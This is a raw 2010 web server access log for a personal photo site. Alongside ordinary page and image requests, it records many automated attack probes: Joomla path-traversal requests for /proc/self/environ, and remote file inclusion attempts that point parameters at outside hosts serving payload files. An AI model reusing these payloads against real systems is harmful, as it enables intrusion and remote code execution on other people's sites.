67.213.231.211 - - [05/Jul/2010:01:40:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:05 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:01:40:05 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
174.142.75.115 - - [05/Jul/2010:01:40:06 -0500] "GET /logs/access_log.1275696000/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
94.136.63.119 - - [05/Jul/2010:01:40:07 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.63.119 - - [05/Jul/2010:01:40:08 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [05/Jul/2010:01:40:08 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
174.142.75.115 - - [05/Jul/2010:01:40:13 -0500] "GET /logs/access_log.1276732800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
211.63.60.50 - - [05/Jul/2010:01:40:26 -0500] "GET /logs/access_log.1266710400%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.63.60.50 - - [05/Jul/2010:01:40:26 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.63.60.50 - - [05/Jul/2010:01:40:26 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.195.112.180 - - [05/Jul/2010:01:40:36 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [05/Jul/2010:01:40:36 -0500] "GET /logs/access_log.1165708800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.63.60.50 - - [05/Jul/2010:01:40:42 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.63.60.50 - - [05/Jul/2010:01:40:42 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.63.60.50 - - [05/Jul/2010:01:40:43 -0500] "GET /logs/access_log.1266710400%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.142.75.115 - - [05/Jul/2010:01:40:50 -0500] "GET /logs/access_log.1276819200/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
110.139.60.147 - - [05/Jul/2010:01:40:53 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:13 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:14 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:15 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:16 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:17 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:18 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:18 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:18 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:21 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:21 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:22 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:22 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:22 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:23 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:24 -0500] "GET /costume/013_JPG%20copy.jpg HTTP/1.1" 200 49391 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:26 -0500] "GET /costume/015_JPG%20copy.jpg HTTP/1.1" 200 47836 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:26 -0500] "GET /costume/016_JPG%20copy.jpg HTTP/1.1" 200 43371 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:27 -0500] "GET /costume/017_JPG%20copy.jpg HTTP/1.1" 200 45390 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:27 -0500] "GET /costume/014_JPG%20copy.jpg HTTP/1.1" 200 50000 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:29 -0500] "GET /costume/018_JPG%20copy.jpg HTTP/1.1" 200 46283 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:30 -0500] "GET /costume/019_JPG%20copy.jpg HTTP/1.1" 200 50528 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:31 -0500] "GET /costume/020_JPG%20copy.jpg HTTP/1.1" 200 43734 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:31 -0500] "GET /costume/022_JPG%20copy.jpg HTTP/1.1" 200 44855 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:32 -0500] "GET /costume/021_JPG%20copy.jpg HTTP/1.1" 200 46071 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:33 -0500] "GET /costume/023_JPG%20copy.jpg HTTP/1.1" 200 49344 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
110.139.60.147 - - [05/Jul/2010:01:41:33 -0500] "GET /costume/024_JPG%20copy.jpg HTTP/1.1" 200 48964 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
207.191.228.114 - - [05/Jul/2010:01:41:43 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:43 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:43 -0500] "POST /logs/access_log.1266710400//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:43 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:43 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:43 -0500] "POST /logs/access_log.1266710400//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:43 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:43 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:43 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:43 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:44 -0500] "POST /logs/access_log.1266710400//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:41:44 -0500] "POST /logs/access_log.1266710400//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
174.142.61.241 - - [05/Jul/2010:01:41:44 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:41:45 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:41:45 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.136.63.119 - - [05/Jul/2010:01:41:57 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.63.119 - - [05/Jul/2010:01:41:57 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [05/Jul/2010:01:41:58 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.136.63.119 - - [05/Jul/2010:01:42:12 -0500] "GET /logs/access_log.1275696000/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
174.142.75.115 - - [05/Jul/2010:01:42:32 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:42:32 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.75.115 - - [05/Jul/2010:01:42:32 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.136.63.119 - - [05/Jul/2010:01:42:40 -0500] "GET /logs/access_log.1276732800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
80.93.62.100 - - [05/Jul/2010:01:42:42 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:42 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:42 -0500] "POST /logs/access_log.1266710400//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:42 -0500] "POST /logs/access_log.1266710400//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:42 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:42 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:42 -0500] "POST /logs/access_log.1266710400//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:42 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:42 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:43 -0500] "POST /logs/access_log.1266710400//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:43 -0500] "POST /logs//contact.php HTTP/1.1" 404 301 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:42:43 -0500] "POST //contact.php HTTP/1.1" 404 296 "-""plaNETWORK Bot Search"
174.142.75.115 - - [05/Jul/2010:01:42:53 -0500] "GET /logs/access_log.1277251200/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.61.241 - - [05/Jul/2010:01:43:06 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:43:06 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:43:07 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.136.63.119 - - [05/Jul/2010:01:43:56 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.136.63.119 - - [05/Jul/2010:01:43:57 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [05/Jul/2010:01:43:57 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.136.63.119 - - [05/Jul/2010:01:44:24 -0500] "GET /logs/access_log.1277251200/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
174.142.61.241 - - [05/Jul/2010:01:44:29 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:44:29 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:44:29 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:44:50 -0500] "GET /logs/access_log.1276732800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:45:18 -0500] "GET /logs/access_log.1275696000/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
207.46.199.191 - - [05/Jul/2010:01:46:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.142.61.241 - - [05/Jul/2010:01:46:16 -0500] "GET /logs/access_log.1276819200/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
92.60.176.46 - - [05/Jul/2010:01:47:09 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:01:47:09 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:01:47:16 -0500] "GET /logs/access_log.1275782400/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
207.191.228.114 - - [05/Jul/2010:01:47:39 -0500] "POST /logs/access_log.1268352000//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:47:39 -0500] "POST /logs/access_log.1268352000//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:47:39 -0500] "POST /logs/access_log.1268352000//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:01:47:39 -0500] "POST /logs/access_log.1268352000//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
174.142.61.241 - - [05/Jul/2010:01:48:21 -0500] "GET /logs/access_log.1277164800/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:48:21 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.61.241 - - [05/Jul/2010:01:48:21 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
193.252.118.175 - - [05/Jul/2010:01:48:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.118.175 - - [05/Jul/2010:01:48:44 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
174.142.61.241 - - [05/Jul/2010:01:48:58 -0500] "GET /logs/access_log.1277251200/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.181.206.129 - - [05/Jul/2010:01:50:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.stumbleupon.com/refer.php?url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
67.181.206.129 - - [05/Jul/2010:01:50:55 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
67.195.112.180 - - [05/Jul/2010:01:51:11 -0500] "GET /logs/access_log.1237852800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.93.62.100 - - [05/Jul/2010:01:51:52 -0500] "POST /logs/access_log.1268352000//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:51:52 -0500] "POST /logs/access_log.1268352000//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:51:52 -0500] "POST /logs/access_log.1268352000//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
80.93.62.100 - - [05/Jul/2010:01:51:53 -0500] "POST /logs/access_log.1268352000//contact.php HTTP/1.1" 404 323 "-""plaNETWORK Bot Search"
77.221.130.30 - - [05/Jul/2010:01:52:16 -0500] "GET /bad_link.php?theme_path=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.221.130.30 - - [05/Jul/2010:01:52:16 -0500] "GET /logs/bad_link.php?theme_path=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.30 - - [05/Jul/2010:01:52:16 -0500] "GET /logs/access_log.1276819200%20%20/bad_link.php?theme_path=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.99.17.62 - - [05/Jul/2010:01:53:24 -0500] "GET //?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
91.199.120.6 - - [05/Jul/2010:01:53:32 -0500] "GET //?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
77.221.130.30 - - [05/Jul/2010:01:55:57 -0500] "GET /logs/bad_link.php?theme_path=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.30 - - [05/Jul/2010:01:55:57 -0500] "GET /bad_link.php?theme_path=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.221.130.30 - - [05/Jul/2010:01:55:57 -0500] "GET /logs/access_log.1276819200%20%20/bad_link.php?theme_path=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
209.61.244.6 - - [05/Jul/2010:01:58:45 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:01:58:48 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
